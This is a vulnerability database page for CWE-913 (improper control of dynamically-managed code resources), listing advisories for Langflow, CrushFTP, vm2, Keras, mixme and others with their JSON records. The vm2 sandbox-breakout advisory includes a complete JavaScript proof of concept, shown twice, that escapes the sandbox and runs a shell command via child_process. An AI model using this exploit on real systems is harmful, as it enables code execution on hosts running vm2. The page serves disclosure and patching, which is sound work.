Common Weakness Enumeration

CWE-913

Allowed-with-Review

Improper Control of Dynamically-Managed Code Resources

Abstraction: Class · Status: Incomplete

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.

159 vulnerabilities reference this CWE, most recent first.

GHSA-6J6G-J4QM-M9JF

Vulnerability from github – Published: 2024-07-30 18:32 – Updated: 2024-07-30 18:32
VLAI
Details

Langflow versions prior to 1.0.13 suffer from a Privilege Escalation vulnerability, allowing a remote and low privileged attacker to gain super admin privileges by performing a mass assignment request on the '/api/v1/users' endpoint.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7297"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-30T17:15:14Z",
    "severity": "HIGH"
  },
  "details": "Langflow versions prior to 1.0.13 suffer from a Privilege Escalation vulnerability, allowing a remote and low privileged attacker to gain super admin privileges by performing a mass assignment request on the \u0027/api/v1/users\u0027 endpoint.",
  "id": "GHSA-6j6g-j4qm-m9jf",
  "modified": "2024-07-30T18:32:06Z",
  "published": "2024-07-30T18:32:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7297"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/research/tra-2024-26"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6M2H-JQ7C-RVM8

Vulnerability from github – Published: 2022-05-13 01:31 – Updated: 2022-05-13 01:31
VLAI
Details

A vulnerability in the Fibre Channel over Ethernet (FCoE) protocol implementation in Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to an incorrect allocation of an internal interface index. An adjacent attacker with the ability to submit a crafted FCoE packet that crosses affected interfaces could trigger this vulnerability. A successful exploit could allow the attacker to cause a packet loop and high throughput on the affected interfaces, resulting in a DoS condition. This vulnerability has been fixed in version 7.3(5)N1(1).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-1595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-06T22:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the Fibre Channel over Ethernet (FCoE) protocol implementation in Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to an incorrect allocation of an internal interface index. An adjacent attacker with the ability to submit a crafted FCoE packet that crosses affected interfaces could trigger this vulnerability. A successful exploit could allow the attacker to cause a packet loop and high throughput on the affected interfaces, resulting in a DoS condition. This vulnerability has been fixed in version 7.3(5)N1(1).",
  "id": "GHSA-6m2h-jq7c-rvm8",
  "modified": "2022-05-13T01:31:32Z",
  "published": "2022-05-13T01:31:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1595"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190306-nexus-fbr-dos"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107320"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6WMG-7VXW-42FX

Vulnerability from github – Published: 2023-11-18 00:30 – Updated: 2023-11-29 21:30
VLAI
Details

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-43177"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-18T00:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.",
  "id": "GHSA-6wmg-7vxw-42fx",
  "modified": "2023-11-29T21:30:17Z",
  "published": "2023-11-18T00:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43177"
    },
    {
      "type": "WEB",
      "url": "https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered"
    },
    {
      "type": "WEB",
      "url": "https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7599-M67M-VJ83

Vulnerability from github – Published: 2025-11-11 18:30 – Updated: 2025-11-11 18:30
VLAI
Details

Improper control of dynamically-managed code resources for some Intel(R) NPU Drivers within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires passive user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26405"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-11T17:15:44Z",
    "severity": "MODERATE"
  },
  "details": "Improper control of dynamically-managed code resources for some Intel(R) NPU Drivers within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires passive user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.",
  "id": "GHSA-7599-m67m-vj83",
  "modified": "2025-11-11T18:30:18Z",
  "published": "2025-11-11T18:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26405"
    },
    {
      "type": "WEB",
      "url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01304.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-76W7-J9CQ-RX2J

Vulnerability from github – Published: 2026-05-29 17:40 – Updated: 2026-06-12 20:50
VLAI
Summary
vm2 is Vulnerable to Sandbox Breakout Through Promise Species
Details

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

The localPromise constructor was changed to call this.then(undefined, eater) to ensure a rejected promise is always used. However, this is missing a call to resetPromiseSpecies to ensure that this has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox.

PoC

const {VM} = require("vm2");
const vm = new VM();
vm.run(`
class E extends Error {}
function so(d) {
    if (d > 0) so(d-1);
    const e = new E();
    e.stack;
    throw e;
}
let ex, ct;
class FakePromise extends Promise {
    static get [Symbol.species](){return ct;}
}
function doCatch(f) {
    ex=undefined;
    const p=Promise.withResolvers();
    ct = function(e){e(f, v=>{ex=v;p.resolve();})};
    new FakePromise(r=>r());
    return p.promise;
}
(async function f(s) {
    let min = s;
    let max = 100000;
    while (min<max) {
        const mid = (min+max)>>1;
        await doCatch(()=>so(mid));
        if (ex.name==="RangeError" && !(ex instanceof RangeError)) {
            ex.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
            return;
        }
        if (ex instanceof E) {
            min = mid+1;
        } else {
            max = mid;
        }
    }
    f(s+1);
})(0);
`);

Impact

Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.11.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47208"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T17:40:15Z",
    "nvd_published_at": "2026-06-12T15:16:28Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nThe `localPromise` constructor was changed to call `this.then(undefined, eater)` to ensure a rejected promise is always used. However, this is missing a call to `resetPromiseSpecies` to ensure that `this` has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nvm.run(`\nclass E extends Error {}\nfunction so(d) {\n\tif (d \u003e 0) so(d-1);\n\tconst e = new E();\n\te.stack;\n\tthrow e;\n}\nlet ex, ct;\nclass FakePromise extends Promise {\n\tstatic get [Symbol.species](){return ct;}\n}\nfunction doCatch(f) {\n\tex=undefined;\n\tconst p=Promise.withResolvers();\n\tct = function(e){e(f, v=\u003e{ex=v;p.resolve();})};\n\tnew FakePromise(r=\u003er());\n\treturn p.promise;\n}\n(async function f(s) {\n\tlet min = s;\n\tlet max = 100000;\n\twhile (min\u003cmax) {\n\t\tconst mid = (min+max)\u003e\u003e1;\n\t\tawait doCatch(()=\u003eso(mid));\n\t\tif (ex.name===\"RangeError\" \u0026\u0026 !(ex instanceof RangeError)) {\n\t\t\tex.constructor.constructor(\"return process\")().mainModule.require(\u0027child_process\u0027).execSync(\u0027touch pwned\u0027);\n\t\t\treturn;\n\t\t}\n\t\tif (ex instanceof E) {\n\t\t\tmin = mid+1;\n\t\t} else {\n\t\t\tmax = mid;\n\t\t}\n\t}\n\tf(s+1);\n})(0);\n`);\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.",
  "id": "GHSA-76w7-j9cq-rx2j",
  "modified": "2026-06-12T20:50:55Z",
  "published": "2026-05-29T17:40:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-76w7-j9cq-rx2j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47208"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/a462655009669c3124ee39498121651597529ea8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 is Vulnerable to Sandbox Breakout Through Promise Species"
}

GHSA-77WQ-646F-JRM2

Vulnerability from github – Published: 2025-09-19 09:31 – Updated: 2025-09-19 17:34
VLAI
Summary
Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.

Original Description

The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.

One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.

This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.

Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-19T17:34:15Z",
    "nvd_published_at": "2025-09-19T09:15:36Z",
    "severity": "HIGH"
  },
  "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.\n\n### Original Description\nThe Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.",
  "id": "GHSA-77wq-646f-jrm2",
  "modified": "2025-09-19T17:34:15Z",
  "published": "2025-09-19T09:31:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21602"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.",
  "withdrawn": "2025-09-19T17:34:15Z"
}

GHSA-79JW-6WG7-R9G4

Vulnerability from github – Published: 2021-05-06 15:45 – Updated: 2021-05-07 21:13
VLAI
Summary
Use of Potentially Dangerous Function in mixme
Details

Impact

In Node.js mixme v0.5.0, an attacker can add or alter properties of an object via 'proto' through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).

Patches

The problem is corrected starting with version 0.5.1.

References

Issue: https://github.com/adaltas/node-mixme/issues/1 Commit: https://github.com/adaltas/node-mixme/commit/cfd5fbfc32368bcf7e06d1c5985ea60e34cd4028

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "mixme"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-29491"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-05T18:39:38Z",
    "nvd_published_at": "2021-05-06T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nIn Node.js mixme v0.5.0, an attacker can add or alter properties of an object via \u0027proto\u0027 through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).\n\n### Patches\nThe problem is corrected starting with version 0.5.1.\n\n### References\nIssue: https://github.com/adaltas/node-mixme/issues/1\nCommit: https://github.com/adaltas/node-mixme/commit/cfd5fbfc32368bcf7e06d1c5985ea60e34cd4028\n\n",
  "id": "GHSA-79jw-6wg7-r9g4",
  "modified": "2021-05-07T21:13:59Z",
  "published": "2021-05-06T15:45:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/adaltas/node-mixme/security/advisories/GHSA-79jw-6wg7-r9g4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29491"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210622-0002"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Use of Potentially Dangerous Function in mixme"
}

GHSA-7JXR-CG7F-GPGV

Vulnerability from github – Published: 2023-04-07 20:35 – Updated: 2023-04-07 20:35
VLAI
Summary
vm2 vulnerable to sandbox escape
Details

vm2 was not properly handling host objects passed to Error.prepareStackTrace in case of unhandled async errors.

  • vm2 version: ~3.9.14
  • Node version: 18.15.0, 19.8.1, 17.9.1

Impact

A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.

Patches

This vulnerability was patched in the release of version 3.9.15 of vm2.

Workarounds

None.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.9.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-29017"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-04-07T20:35:03Z",
    "nvd_published_at": "2023-04-06T20:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors.\n\n- vm2 version: ~3.9.14\n- Node version: 18.15.0, 19.8.1, 17.9.1\n\n### Impact\nA threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.\n\n### Patches\nThis vulnerability was patched in the release of version `3.9.15` of `vm2`.\n\n### Workarounds\nNone.",
  "id": "GHSA-7jxr-cg7f-gpgv",
  "modified": "2023-04-07T20:35:03Z",
  "published": "2023-04-07T20:35:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29017"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/issues/515"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 vulnerable to sandbox escape"
}

GHSA-82R4-FHR7-R9F8

Vulnerability from github – Published: 2022-09-06 00:00 – Updated: 2022-09-09 00:00
VLAI
Details

Attacker might be able to execute malicious Perl code in the Template toolkit, by having the admin installing an unverified 3th party package

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-39051"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-05T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "Attacker might be able to execute malicious Perl code in the Template toolkit, by having the admin installing an unverified 3th party package",
  "id": "GHSA-82r4-fhr7-r9f8",
  "modified": "2022-09-09T00:00:50Z",
  "published": "2022-09-06T00:00:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39051"
    },
    {
      "type": "WEB",
      "url": "https://otrs.com/release-notes/otrs-security-advisory-2022-12"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-86MX-982P-MGC2

Vulnerability from github – Published: 2022-05-24 17:04 – Updated: 2022-05-24 17:04
VLAI
Details

There was a man-in-the-middle (MITM) vulnerability present in the Confluence Previews plugin in Confluence Server and Confluence Data Center. This plugin was used to facilitate communication with the Atlassian Companion application. The Confluence Previews plugin in Confluence Server and Confluence Data Center communicated with the Companion application via the atlassian-domain-for-localhost-connections-only.com domain name, the DNS A record of which points at 127.0.0.1. Additionally, a signed certificate for the domain was publicly distributed with the Companion application. An attacker in the position to control DNS resolution of their victim could carry out a man-in-the-middle (MITM) attack between Confluence Server (or Confluence Data Center) and the atlassian-domain-for-localhost-connections-only.com domain intended to be used with the Companion application. This certificate has been revoked, however, usage of the atlassian-domain-for-localhost-connections-only.com domain name was still present in Confluence Server and Confluence Data Center. An attacker could perform the described attack by denying their victim access to certificate revocation information, and carry out a man-in-the-middle (MITM) attack to observe files being edited using the Companion application and/or modify them, and access some limited user information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-15006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-12-19T01:15:00Z",
    "severity": "MODERATE"
  },
  "details": "There was a man-in-the-middle (MITM) vulnerability present in the Confluence Previews plugin in Confluence Server and Confluence Data Center. This plugin was used to facilitate communication with the Atlassian Companion application. The Confluence Previews plugin in Confluence Server and Confluence Data Center communicated with the Companion application via the atlassian-domain-for-localhost-connections-only.com domain name, the DNS A record of which points at 127.0.0.1. Additionally, a signed certificate for the domain was publicly distributed with the Companion application. An attacker in the position to control DNS resolution of their victim could carry out a man-in-the-middle (MITM) attack between Confluence Server (or Confluence Data Center) and the atlassian-domain-for-localhost-connections-only.com domain intended to be used with the Companion application. This certificate has been revoked, however, usage of the atlassian-domain-for-localhost-connections-only.com domain name was still present in Confluence Server and Confluence Data Center. An attacker could perform the described attack by denying their victim access to certificate revocation information, and carry out a man-in-the-middle (MITM) attack to observe files being edited using the Companion application and/or modify them, and access some limited user information.",
  "id": "GHSA-86mx-982p-mgc2",
  "modified": "2022-05-24T17:04:41Z",
  "published": "2022-05-24T17:04:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15006"
    },
    {
      "type": "WEB",
      "url": "https://confluence.atlassian.com/doc/confluence-security-advisory-2019-12-18-982324349.html"
    },
    {
      "type": "WEB",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-59244"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Dec/36"
    },
    {
      "type": "WEB",
      "url": "https://twitter.com/SwiftOnSecurity/status/1202034106495832067"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/155742/Atlassian-Confluence-Man-In-The-Middle.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of acceptable values.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that it does not need to be dynamically managed.

No CAPEC attack patterns related to this CWE.